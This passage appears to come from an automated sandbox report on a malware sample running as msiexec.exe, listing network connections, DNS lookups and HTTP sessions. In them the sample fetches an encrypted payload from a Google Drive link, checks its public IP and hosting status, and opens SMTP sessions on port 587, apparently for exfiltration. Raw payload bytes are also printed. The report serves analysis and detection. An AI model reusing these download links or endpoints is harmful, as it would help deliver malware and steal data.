                                                                                              Nov 5, 2024 16:10:25.647691965 CET49889443192.168.2.9142.250.185.193
                                                                                              Nov 5, 2024 16:10:25.647697926 CET44349889142.250.185.193192.168.2.9
                                                                                              Nov 5, 2024 16:10:25.647733927 CET49889443192.168.2.9142.250.185.193
                                                                                              Nov 5, 2024 16:10:25.647769928 CET44349889142.250.185.193192.168.2.9
                                                                                              Nov 5, 2024 16:10:25.647803068 CET49889443192.168.2.9142.250.185.193
                                                                                              Nov 5, 2024 16:10:25.647804976 CET44349889142.250.185.193192.168.2.9
                                                                                              Nov 5, 2024 16:10:25.647811890 CET44349889142.250.185.193192.168.2.9
                                                                                              Nov 5, 2024 16:10:25.647860050 CET49889443192.168.2.9142.250.185.193
                                                                                              Nov 5, 2024 16:10:25.648458004 CET44349889142.250.185.193192.168.2.9
                                                                                              Nov 5, 2024 16:10:25.648504019 CET49889443192.168.2.9142.250.185.193
                                                                                              Nov 5, 2024 16:10:25.648507118 CET44349889142.250.185.193192.168.2.9
                                                                                              Nov 5, 2024 16:10:25.648513079 CET44349889142.250.185.193192.168.2.9
                                                                                              Nov 5, 2024 16:10:25.648542881 CET49889443192.168.2.9142.250.185.193
                                                                                              Nov 5, 2024 16:10:25.648545980 CET44349889142.250.185.193192.168.2.9
                                                                                              Nov 5, 2024 16:10:25.648570061 CET44349889142.250.185.193192.168.2.9
                                                                                              Nov 5, 2024 16:10:25.648576021 CET49889443192.168.2.9142.250.185.193
                                                                                              Nov 5, 2024 16:10:25.648578882 CET44349889142.250.185.193192.168.2.9
                                                                                              Nov 5, 2024 16:10:25.648612022 CET49889443192.168.2.9142.250.185.193
                                                                                              Nov 5, 2024 16:10:25.650743961 CET44349889142.250.185.193192.168.2.9
                                                                                              Nov 5, 2024 16:10:25.650787115 CET49889443192.168.2.9142.250.185.193
                                                                                              Nov 5, 2024 16:10:25.650788069 CET44349889142.250.185.193192.168.2.9
                                                                                              Nov 5, 2024 16:10:25.650794983 CET44349889142.250.185.193192.168.2.9
                                                                                              Nov 5, 2024 16:10:25.650821924 CET49889443192.168.2.9142.250.185.193
                                                                                              Nov 5, 2024 16:10:25.650825977 CET44349889142.250.185.193192.168.2.9
                                                                                              Nov 5, 2024 16:10:25.650854111 CET49889443192.168.2.9142.250.185.193
                                                                                              Nov 5, 2024 16:10:25.652848005 CET44349889142.250.185.193192.168.2.9
                                                                                              Nov 5, 2024 16:10:25.652892113 CET49889443192.168.2.9142.250.185.193
                                                                                              Nov 5, 2024 16:10:25.652894974 CET44349889142.250.185.193192.168.2.9
                                                                                              Nov 5, 2024 16:10:25.652929068 CET49889443192.168.2.9142.250.185.193
                                                                                              Nov 5, 2024 16:10:25.656424999 CET44349889142.250.185.193192.168.2.9
                                                                                              Nov 5, 2024 16:10:25.656471968 CET49889443192.168.2.9142.250.185.193
                                                                                              Nov 5, 2024 16:10:25.656476021 CET44349889142.250.185.193192.168.2.9
                                                                                              Nov 5, 2024 16:10:25.656505108 CET49889443192.168.2.9142.250.185.193
                                                                                              Nov 5, 2024 16:10:25.659663916 CET44349889142.250.185.193192.168.2.9
                                                                                              Nov 5, 2024 16:10:25.659714937 CET49889443192.168.2.9142.250.185.193
                                                                                              Nov 5, 2024 16:10:25.659718990 CET44349889142.250.185.193192.168.2.9
                                                                                              Nov 5, 2024 16:10:25.659750938 CET49889443192.168.2.9142.250.185.193
                                                                                              Nov 5, 2024 16:10:25.663325071 CET44349889142.250.185.193192.168.2.9
                                                                                              Nov 5, 2024 16:10:25.663373947 CET49889443192.168.2.9142.250.185.193
                                                                                              Nov 5, 2024 16:10:25.665962934 CET44349889142.250.185.193192.168.2.9
                                                                                              Nov 5, 2024 16:10:25.666013002 CET49889443192.168.2.9142.250.185.193
                                                                                              Nov 5, 2024 16:10:25.666199923 CET44349889142.250.185.193192.168.2.9
                                                                                              Nov 5, 2024 16:10:25.666238070 CET49889443192.168.2.9142.250.185.193
                                                                                              Nov 5, 2024 16:10:25.666240931 CET44349889142.250.185.193192.168.2.9
                                                                                              Nov 5, 2024 16:10:25.666271925 CET49889443192.168.2.9142.250.185.193
                                                                                              Nov 5, 2024 16:10:25.666328907 CET49889443192.168.2.9142.250.185.193
                                                                                              Nov 5, 2024 16:10:25.666352034 CET44349889142.250.185.193192.168.2.9
                                                                                              Nov 5, 2024 16:10:25.666397095 CET49889443192.168.2.9142.250.185.193
                                                                                              Nov 5, 2024 16:10:26.010294914 CET49913443192.168.2.9172.67.74.152
                                                                                              Nov 5, 2024 16:10:26.010320902 CET44349913172.67.74.152192.168.2.9
                                                                                              Nov 5, 2024 16:10:26.010454893 CET49913443192.168.2.9172.67.74.152
                                                                                              Nov 5, 2024 16:10:26.012870073 CET49913443192.168.2.9172.67.74.152
                                                                                              Nov 5, 2024 16:10:26.012878895 CET44349913172.67.74.152192.168.2.9
                                                                                              Nov 5, 2024 16:10:26.624542952 CET44349913172.67.74.152192.168.2.9
                                                                                              Nov 5, 2024 16:10:26.624676943 CET49913443192.168.2.9172.67.74.152
                                                                                              Nov 5, 2024 16:10:26.627796888 CET49913443192.168.2.9172.67.74.152
                                                                                              Nov 5, 2024 16:10:26.627804995 CET44349913172.67.74.152192.168.2.9
                                                                                              Nov 5, 2024 16:10:26.628032923 CET44349913172.67.74.152192.168.2.9
                                                                                              Nov 5, 2024 16:10:26.635334969 CET49913443192.168.2.9172.67.74.152
                                                                                              Nov 5, 2024 16:10:26.679328918 CET44349913172.67.74.152192.168.2.9
                                                                                              Nov 5, 2024 16:10:26.882175922 CET44349913172.67.74.152192.168.2.9
                                                                                              Nov 5, 2024 16:10:26.882364988 CET44349913172.67.74.152192.168.2.9
                                                                                              Nov 5, 2024 16:10:26.882458925 CET49913443192.168.2.9172.67.74.152
                                                                                              Nov 5, 2024 16:10:26.889931917 CET49913443192.168.2.9172.67.74.152
                                                                                              Nov 5, 2024 16:10:26.906929016 CET4991980192.168.2.9208.95.112.1
                                                                                              Nov 5, 2024 16:10:26.912282944 CET8049919208.95.112.1192.168.2.9
                                                                                              Nov 5, 2024 16:10:26.912353039 CET4991980192.168.2.9208.95.112.1
                                                                                              Nov 5, 2024 16:10:26.912455082 CET4991980192.168.2.9208.95.112.1
                                                                                              Nov 5, 2024 16:10:26.917506933 CET8049919208.95.112.1192.168.2.9
                                                                                              Nov 5, 2024 16:10:27.506899118 CET8049919208.95.112.1192.168.2.9
                                                                                              Nov 5, 2024 16:10:27.547525883 CET4991980192.168.2.9208.95.112.1
                                                                                              Nov 5, 2024 16:10:28.904753923 CET4991980192.168.2.9208.95.112.1
                                                                                              Nov 5, 2024 16:10:28.910810947 CET8049919208.95.112.1192.168.2.9
                                                                                              Nov 5, 2024 16:10:28.913022041 CET4991980192.168.2.9208.95.112.1
                                                                                              Nov 5, 2024 16:10:29.205523968 CET49933587192.168.2.9208.91.199.223
                                                                                              Nov 5, 2024 16:10:29.210424900 CET58749933208.91.199.223192.168.2.9
                                                                                              Nov 5, 2024 16:10:29.210506916 CET49933587192.168.2.9208.91.199.223
                                                                                              Nov 5, 2024 16:10:29.785978079 CET58749933208.91.199.223192.168.2.9
                                                                                              Nov 5, 2024 16:10:29.786206961 CET49933587192.168.2.9208.91.199.223
                                                                                              Nov 5, 2024 16:10:29.791043997 CET58749933208.91.199.223192.168.2.9
                                                                                              Nov 5, 2024 16:10:29.941250086 CET58749933208.91.199.223192.168.2.9
                                                                                              Nov 5, 2024 16:10:29.941703081 CET49933587192.168.2.9208.91.199.223
                                                                                              Nov 5, 2024 16:10:29.946557045 CET58749933208.91.199.223192.168.2.9
                                                                                              Nov 5, 2024 16:10:30.099355936 CET58749933208.91.199.223192.168.2.9
                                                                                              Nov 5, 2024 16:10:30.103043079 CET49933587192.168.2.9208.91.199.223
                                                                                              Nov 5, 2024 16:10:30.108359098 CET58749933208.91.199.223192.168.2.9
                                                                                              Nov 5, 2024 16:10:30.264606953 CET58749933208.91.199.223192.168.2.9
                                                                                              Nov 5, 2024 16:10:30.266959906 CET49933587192.168.2.9208.91.199.223
                                                                                              Nov 5, 2024 16:10:30.272027016 CET58749933208.91.199.223192.168.2.9
                                                                                              Nov 5, 2024 16:10:30.423809052 CET58749933208.91.199.223192.168.2.9
                                                                                              Nov 5, 2024 16:10:30.424019098 CET49933587192.168.2.9208.91.199.223
                                                                                              Nov 5, 2024 16:10:30.428886890 CET58749933208.91.199.223192.168.2.9
                                                                                              Nov 5, 2024 16:10:30.648905993 CET58749933208.91.199.223192.168.2.9
                                                                                              Nov 5, 2024 16:10:30.651019096 CET49933587192.168.2.9208.91.199.223
                                                                                              Nov 5, 2024 16:10:30.659039974 CET58749933208.91.199.223192.168.2.9
                                                                                              Nov 5, 2024 16:10:30.807342052 CET58749933208.91.199.223192.168.2.9
                                                                                              Nov 5, 2024 16:10:30.807981014 CET49933587192.168.2.9208.91.199.223
                                                                                              Nov 5, 2024 16:10:30.808031082 CET49933587192.168.2.9208.91.199.223
                                                                                              Nov 5, 2024 16:10:30.808062077 CET49933587192.168.2.9208.91.199.223
                                                                                              Nov 5, 2024 16:10:30.808073997 CET49933587192.168.2.9208.91.199.223
                                                                                              Nov 5, 2024 16:10:30.812908888 CET58749933208.91.199.223192.168.2.9
                                                                                              Nov 5, 2024 16:10:30.812994957 CET58749933208.91.199.223192.168.2.9
                                                                                              Nov 5, 2024 16:10:30.813112020 CET58749933208.91.199.223192.168.2.9
                                                                                              Nov 5, 2024 16:10:30.813121080 CET58749933208.91.199.223192.168.2.9
                                                                                              Nov 5, 2024 16:10:31.091789961 CET58749933208.91.199.223192.168.2.9
                                                                                              Nov 5, 2024 16:10:31.141311884 CET49933587192.168.2.9208.91.199.223
                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Nov 5, 2024 16:10:20.368829012 CET6083253192.168.2.91.1.1.1
                                                                                              Nov 5, 2024 16:10:20.375813961 CET53608321.1.1.1192.168.2.9
                                                                                              Nov 5, 2024 16:10:21.738379002 CET5745253192.168.2.91.1.1.1
                                                                                              Nov 5, 2024 16:10:21.744918108 CET53574521.1.1.1192.168.2.9
                                                                                              Nov 5, 2024 16:10:25.997361898 CET5352853192.168.2.91.1.1.1
                                                                                              Nov 5, 2024 16:10:26.005872965 CET53535281.1.1.1192.168.2.9
                                                                                              Nov 5, 2024 16:10:26.897666931 CET5400953192.168.2.91.1.1.1
                                                                                              Nov 5, 2024 16:10:26.906153917 CET53540091.1.1.1192.168.2.9
                                                                                              Nov 5, 2024 16:10:28.909632921 CET5290953192.168.2.91.1.1.1
                                                                                              Nov 5, 2024 16:10:29.193836927 CET53529091.1.1.1192.168.2.9
                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                              Nov 5, 2024 16:10:20.368829012 CET192.168.2.91.1.1.10xb6acStandard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                              Nov 5, 2024 16:10:21.738379002 CET192.168.2.91.1.1.10x3fddStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                              Nov 5, 2024 16:10:25.997361898 CET192.168.2.91.1.1.10xa6a4Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                              Nov 5, 2024 16:10:26.897666931 CET192.168.2.91.1.1.10xe9bStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                              Nov 5, 2024 16:10:28.909632921 CET192.168.2.91.1.1.10xbea9Standard query (0)smtp.santonswitchgears.comA (IP address)IN (0x0001)false
                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                              Nov 5, 2024 16:09:45.702630997 CET1.1.1.1192.168.2.90x3a8cNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.netazurefd-t-fb-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                              Nov 5, 2024 16:09:45.702630997 CET1.1.1.1192.168.2.90x3a8cNo error (0)dual.s-part-0017.t-0009.fb-t-msedge.nets-part-0017.t-0009.fb-t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                              Nov 5, 2024 16:09:45.702630997 CET1.1.1.1192.168.2.90x3a8cNo error (0)s-part-0017.t-0009.fb-t-msedge.net13.107.253.45A (IP address)IN (0x0001)false
                                                                                              Nov 5, 2024 16:10:20.375813961 CET1.1.1.1192.168.2.90xb6acNo error (0)drive.google.com216.58.206.46A (IP address)IN (0x0001)false
                                                                                              Nov 5, 2024 16:10:21.744918108 CET1.1.1.1192.168.2.90x3fddNo error (0)drive.usercontent.google.com142.250.185.193A (IP address)IN (0x0001)false
                                                                                              Nov 5, 2024 16:10:26.005872965 CET1.1.1.1192.168.2.90xa6a4No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                              Nov 5, 2024 16:10:26.005872965 CET1.1.1.1192.168.2.90xa6a4No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                              Nov 5, 2024 16:10:26.005872965 CET1.1.1.1192.168.2.90xa6a4No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                              Nov 5, 2024 16:10:26.906153917 CET1.1.1.1192.168.2.90xe9bNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                              Nov 5, 2024 16:10:29.193836927 CET1.1.1.1192.168.2.90xbea9No error (0)smtp.santonswitchgears.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                              Nov 5, 2024 16:10:29.193836927 CET1.1.1.1192.168.2.90xbea9No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                              Nov 5, 2024 16:10:29.193836927 CET1.1.1.1192.168.2.90xbea9No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                              Nov 5, 2024 16:10:29.193836927 CET1.1.1.1192.168.2.90xbea9No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                              Nov 5, 2024 16:10:29.193836927 CET1.1.1.1192.168.2.90xbea9No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                              • drive.google.com
                                                                                              • drive.usercontent.google.com
                                                                                              • api.ipify.org
                                                                                              • ip-api.com
                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              0192.168.2.949919208.95.112.180764C:\Windows\SysWOW64\msiexec.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Nov 5, 2024 16:10:26.912455082 CET80OUTGET /line/?fields=hosting HTTP/1.1
                                                                                              Host: ip-api.com
                                                                                              Connection: Keep-Alive
                                                                                              Nov 5, 2024 16:10:27.506899118 CET174INHTTP/1.1 200 OK
                                                                                              Date: Tue, 05 Nov 2024 15:10:27 GMT
                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                              Content-Length: 5
                                                                                              Access-Control-Allow-Origin: *
                                                                                              X-Ttl: 60
                                                                                              X-Rl: 44
                                                                                              Data Raw: 74 72 75 65 0a
                                                                                              Data Ascii: true


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              0192.168.2.949879216.58.206.46443764C:\Windows\SysWOW64\msiexec.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-11-05 15:10:21 UTC208OUTGET /uc?export=download&id=1gAzexzfPzo9JKAkR34weoW4e3MtgO3do HTTP/1.1
                                                                                              User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Host: drive.google.com
                                                                                              Cache-Control: no-cache
                                                                                              2024-11-05 15:10:21 UTC1610INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Tue, 05 Nov 2024 15:10:21 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=1gAzexzfPzo9JKAkR34weoW4e3MtgO3do&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Content-Security-Policy: script-src 'nonce-mYzZ75txp-g0nHHhCb6PLw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              1192.168.2.949889142.250.185.193443764C:\Windows\SysWOW64\msiexec.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-11-05 15:10:22 UTC250OUTGET /download?id=1gAzexzfPzo9JKAkR34weoW4e3MtgO3do&export=download HTTP/1.1
                                                                                              User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              2024-11-05 15:10:25 UTC4928INHTTP/1.1 200 OK
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Security-Policy: sandbox
                                                                                              Content-Security-Policy: default-src 'none'
                                                                                              Content-Security-Policy: frame-ancestors 'none'
                                                                                              X-Content-Security-Policy: sandbox
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Cross-Origin-Embedder-Policy: require-corp
                                                                                              Cross-Origin-Resource-Policy: same-site
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Content-Disposition: attachment; filename="FoLGkSjcOLZBQAiJHpnp82.bin"
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Access-Control-Allow-Credentials: false
                                                                                              Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                              Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 246336
                                                                                              Last-Modified: Fri, 11 Oct 2024 11:55:46 GMT
                                                                                              X-GUploader-UploadID: AHmUCY0XIejXUWRvbAA6nDijsQjufYWUjIEboGtW0JkLBFETOqa6a3_33kbV9vcwdyxFJSpfaJoxnvKh2w
                                                                                              Date: Tue, 05 Nov 2024 15:10:24 GMT
                                                                                              Expires: Tue, 05 Nov 2024 15:10:24 GMT
                                                                                              Cache-Control: private, max-age=0
                                                                                              X-Goog-Hash: crc32c=72DA/g==
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close
                                                                                              2024-11-05 15:10:25 UTC4928INData Raw: f1 19 03 90 cd ad 06 cd 3a 41 de 4e 95 5c 08 c6 39 dd 03 8b 46 3f a9 fa 9c 25 34 64 fe 51 ba 13 ac 8e 80 d2 75 41 e8 4a 77 5e 3b 11 40 ae 01 d6 27 c9 a8 20 4d a3 af db 74 cd 37 aa 30 85 70 10 58 45 05 4b 9e 84 08 e7 f1 1c 38 48 ca be 04 d0 1d 76 b1 60 9d d8 68 de 4c 5a 70 46 c3 4c b2 25 01 51 24 9e b2 5c a0 56 e7 c5 65 33 92 07 37 84 97 db de b8 c0 7f de 85 e9 cf 14 51 21 d6 e1 5e b5 3e 41 a7 da 9a 19 fe 8b 2d 0f 9e 95 df ad 16 d7 e7 9e a3 3f c6 9b b9 4b 9b fc 45 59 11 3e 50 fb 56 86 03 dc b0 c5 f8 1f fa da 03 06 c5 8e 2a 0a 21 a2 a8 aa 15 5d a3 d7 b4 4d bf 87 72 c7 87 5d c9 1f d1 9e a2 cc a6 de 17 69 72 96 a9 74 64 34 1f b2 69 b0 41 9d 58 9b 30 d5 0d 41 7c d4 a4 51 35 c9 b5 de f2 ef 0f 2d ab 54 20 b0 87 37 53 9d 68 d6 2b 83 ba b6 e5 62 3c a3 bd d3 96 26
                                                                                              Data Ascii: :AN\9F?%4dQuAJw^;@' Mt70pXEK8Hv`hLZpFL%Q$\Ve37Q!^>A-?KEY>PV*!]Mr]irtd4iAX0A|Q5-T 7Sh+b<&
                                                                                              2024-11-05 15:10:25 UTC4838INData Raw: 7b 7d 51 63 e4 96 d5 2f b6 c7 08 00 14 fc dd ac 1e 02 96 f2 26 92 a3 c9 57 c9 c3 0a 5f be 81 d1 9d 98 58 4e 5e 66 42 d5 9c da df c0 83 17 42 75 63 48 1a 50 c7 6b f1 fa 6f 11 a2 ea 3b e4 2b 40 83 80 83 35 64 fa 69 01 33 d2 d3 67 c4 54 d8 e3 be fc 33 97 0a ed dc b4 0b f7 0e b1 6b a8 f0 49 e2 2b 14 5b 52 01 a7 fb c6 f3 86 ba a1 99 e4 46 b6 6d 52 e6 07 1f 55 d8 b6 5f 32 73 3b 82 41 40 dd 29 2a 02 f1 54 c1 e2 56 df b0 e5 3f ae d6 3b a4 cd dc fe d7 58 dd ce a4 ea 88 71 29 76 da 56 8f 75 b1 38 51 42 d5 11 9c 46 cc 8b 4a cf ff de 7d cb aa ad 8f 97 bd 7f a7 30 18 f1 22 8c 4e 9b c4 03 0b ea 25 47 db 5f 8c 2f 34 2c 5f 86 54 10 c3 f6 ce 99 06 d4 c4 c3 6a f8 0e 04 d3 a0 31 2a f1 96 a7 31 4f 4d f3 59 b3 da ba f8 cd c0 28 59 68 c8 9c 6f 26 3f cd ca 9a f8 aa e5 9f 7b 4d
                                                                                              Data Ascii: {}Qc/&W_XN^fBBucHPko;+@5di3gT3kI+[RFmRU_2s;A@)*TV?;Xq)vVu8QBFJ}0"N%G_/4,_Tj1*1OMY(Yho&?{M
                                                                                              2024-11-05 15:10:25 UTC1326INData Raw: 26 4e 4c 9e d2 2e 9f 31 28 d6 45 2b 44 4d 82 95 1e 8d 05 75 56 f5 d4 f7 d0 47 a1 76 7c 22 4c df d1 1d 37 50 15 50 f7 4c 28 89 a4 9e 20 ed 3c 78 57 c3 5a eb 08 81 64 c5 3a 49 55 cf 25 36 78 1b e7 f0 c4 86 1c ba b4 ae 8e b8 6e 16 10 8d e9 30 68 0c ec 30 d7 db 9e 41 f3 33 c1 86 3b da 8c 6b b5 38 5f 03 94 c9 a4 86 c3 43 ac 0c 7f 4e cd 2f 79 02 84 33 55 89 a1 0b 67 8c 30 3c f5 6e e7 59 cb 53 9f 8f 2a 93 1b d3 a7 01 3e d0 ad 58 1e b4 8a 7f 70 59 cb 5c 89 6f b7 ca 66 ef ca 8d c6 c2 11 e0 e6 42 64 db 07 18 51 d7 0e b6 96 74 49 f3 59 d5 17 85 5c 71 9c d8 a6 ac 34 10 7b 83 65 5b 85 db 9b ac 8b 97 6f 64 5a 37 84 24 71 15 fd 1a df 30 3c 60 61 2f 5b 3d a5 51 20 86 4c f5 6b 9a d6 9c 86 cf cc 10 30 07 72 e6 65 a4 e1 98 a4 d7 a6 ce d3 55 b5 05 bc f2 90 34 b7 15 2b 54 e5
                                                                                              Data Ascii: &NL.1(E+DMuVGv|"L7PPL( <xWZd:IU%6xn0h0A3;k8_CN/y3Ug0<nYS*>XpY\ofBdQtIY\q4{e[odZ7$q0<`a/[=Q Lk0reU4+T
                                                                                              2024-11-05 15:10:25 UTC1378INData Raw: f5 7e 9e 9d be d3 4d 57 fd f2 3c f6 dc 26 c6 73 55 3f a7 24 e4 66 f6 3c be 96 3f b3 be 23 42 8a 23 04 6b 4e c6 33 88 14 50 89 e8 b4 4d bf 79 73 fe a0 0d 8c 1f 2f df a5 cf dd ba 3b 59 10 b6 a8 74 64 34 46 92 68 50 41 9f 01 1d 77 de 0d 40 3a d9 a3 51 1d d5 b5 de f2 11 01 6f 7d 57 de bc ab 37 73 9d 88 d5 2b 7d bb cf ef 62 1c a3 bd f3 95 26 3e 33 05 26 61 e3 9f b5 61 00 6a f0 97 59 ac fe 66 c3 36 0f 6c d9 a8 ee fa b8 d1 cf 4e a9 1a e3 f9 00 3c d0 f0 b8 89 3b 74 ed 30 9e 92 20 1f 07 d0 7c 9d 72 9c 44 ed 93 53 d8 b8 90 f5 87 91 45 75 40 82 eb b8 fc 58 a0 24 b7 f4 6b 95 fa 16 b3 d4 e1 2d 31 0c 35 fa 06 df 2a 51 79 17 80 10 6d 32 0e 9e 9b b2 e1 bd a9 50 88 19 ae 67 78 cc 06 1f 8e 38 b3 7a c6 bc b7 c0 b8 91 a8 25 54 65 b3 db 76 9e cc b2 42 26 8a dd 2c 76 dd 36 b7
                                                                                              Data Ascii: ~MW<&sU?$f<?#B#kN3PMys/;Ytd4FhPAw@:Qo}W7s+}b&>3&aajYf6lN<;t0 |rDSEu@X$k-15*Qym2Pgx8z%TevB&,v6
                                                                                              2024-11-05 15:10:25 UTC1378INData Raw: 9c 6f 56 17 fb ca 9a f2 54 c1 bc 79 b3 9e 65 d9 30 e7 12 3d d6 2b de cc ff 23 57 43 e8 13 d9 00 1a 68 25 23 0b 79 71 bc 96 0b ce 9a e1 6a c7 1b 26 70 7c 6b 5d ff 24 57 f8 55 45 f1 a1 28 74 d9 4b 8e 8d 94 63 e8 e0 1f 3e fb 34 c3 76 f4 e7 49 9c e5 3c fb 86 2b 72 d3 74 ac 82 4b c4 7b 6a 3c 83 d5 e8 5f b7 40 6e 1a 26 d6 f6 23 f7 47 f2 da 7c 73 b0 29 18 23 9c 35 30 b6 62 eb ea 95 f7 63 0d 39 85 b3 03 3e e8 1d 95 82 e1 48 0d e1 f2 f7 4d 80 42 27 3c e2 7f f7 47 46 04 1e 0d 04 ad 56 56 21 23 4e 24 ea 32 aa 60 63 ba 07 17 9b e9 b1 02 58 45 26 15 66 8f 73 ab 1d 65 57 27 8e 5e d9 e8 5c d3 af b4 08 35 fc 32 5f 97 7f 31 95 97 8f ac 15 5e c5 1f 4b 88 7e d6 48 c0 b7 f6 6e 92 15 01 03 e3 5d e6 1b ba 95 a7 8e cf 42 1d d2 21 91 31 45 94 2d 6e 8c 16 ea e3 a2 10 97 27 c5 29
                                                                                              Data Ascii: oVTye0=+#WCh%#yqj&p|k]$WUE(tKc>4vI<+rtK{j<_@n&#G|s)#50bc9>HMB'<GFVV!#N$2`cXE&fseW'^\52_1^K~Hn]B!1E-n')
                                                                                              2024-11-05 15:10:25 UTC1378INData Raw: 30 50 4b 10 e7 e6 89 4a 86 ec bb 90 4c fd 78 0e 30 c3 cf 99 91 1f e2 43 c5 5d c8 6c 87 ad 32 b3 93 00 1d 01 f0 a0 85 49 f0 b0 39 27 a4 dd 63 1a 62 9e 6c 52 da d4 de 55 e5 62 cf 49 96 f5 2d 20 ed 20 8f 9f 29 fe 26 df 76 60 9e 98 38 61 33 20 c9 1d 9d be 35 a4 3b 81 36 fe dc 40 ee 9b 15 cc 2c ef 4e ac b7 da be 79 04 a1 2a 2a 56 9b b8 33 69 17 33 3b 99 04 bd 56 9c 06 ed af 1e cf 82 8c fa 2b 0d cb 72 1f b5 f0 3d 7d 86 0c ed 36 fa 3e c4 09 a8 bb 82 e8 56 c2 09 fa 45 33 49 c5 3e 33 e6 75 a2 04 f3 4d f3 25 56 07 ca 05 1d ba 00 a3 c7 7b 81 93 85 27 96 92 20 0c 45 47 31 71 44 bb 15 39 39 4a 87 f5 60 78 7c 0a 4b 39 9c 74 7d 71 60 1a 9a d5 d1 98 c6 08 00 ea 0e df 95 30 07 96 f2 0e 61 a2 f0 47 e9 c0 0a a1 b2 7f df 63 94 59 b0 12 b7 bd 0a 63 fa d9 c0 7d 16 85 71 60 48
                                                                                              Data Ascii: 0PKJLx0C]l2I9'cblRUbI- )&v`8a3 5;6@,Ny**V3i3;V+r=}6>VE3I>3uM%V{' EG1qD99J`x|K9t}q`0aGcYc}q`H
